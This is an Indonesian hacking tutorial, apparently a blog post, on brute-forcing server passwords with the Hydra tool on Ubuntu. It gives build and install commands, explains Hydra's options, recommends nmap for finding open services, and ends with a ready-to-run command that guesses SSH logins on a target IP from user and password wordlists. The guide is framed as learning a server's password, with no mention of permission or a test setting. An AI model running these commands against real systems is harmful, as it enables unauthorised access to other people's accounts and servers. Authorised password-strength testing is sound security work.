CARA MENGETAHUI PASSWORD SERVER DENGAN CARA BRUTE FORCE ATTACK DENGAN MENGGUNAKAN HYDRA PADA OS UBUNTU

CATATAN HACKING - Brute force attack adalah sebuah metode untuk menebak suatu kunci dari sebuah enkripsi atau sebuah otentikasi dengan cara mencobanya berkali-kali dengan berbagai macam kombinasi huruf angka maupun simbol.

Cara Install Hydra :
kita membutuhkan beberapa file aplikasi untuk hydra.

#apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev \

libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev

kemudian download paket hydra di http://www.thc.org/releases/hydra-7.2-src.tar.gz

extract paket hydra
#tar -xzvf hydra-7.2-src.tar.gz
#cd hydra-7.2-src

./configure
make
make install


Cara menggunakan hydra :
#hydra -L “user list “ -P “word list” ip-target service PLAIN

keterangan :
-L digunakan jika kita mempunyai list user yang kemungkinan dipakek ( gak pakek -L juga boleh tapi harus disebut kan nama user nya, tapi harus huruf L kecil ( l ).
Contoh : -l admin
-P adalah wordlist yang kita gunakan / punya.
Ip target : Diisi target kita, misalnya router / asalkan ada IP termasuk service yang berjalan
Service : layanan yang terbuka.
PLAIN : Jika target kita tidak menggunakan https. Jika ada gunakan -S untuk melakukan koneksi SSL.

Untuk megetahui layanan yang terbuka dapat menggunakan nmap. Tapi harus nmap terlebih dahulu.

#nmap -sV iptarget

Contoh penggunaan hydra:
hydra -L /home/ehmhem/user.txt -P /home/ehmhem/password.lst 192.168.1.1 ssh PLAIN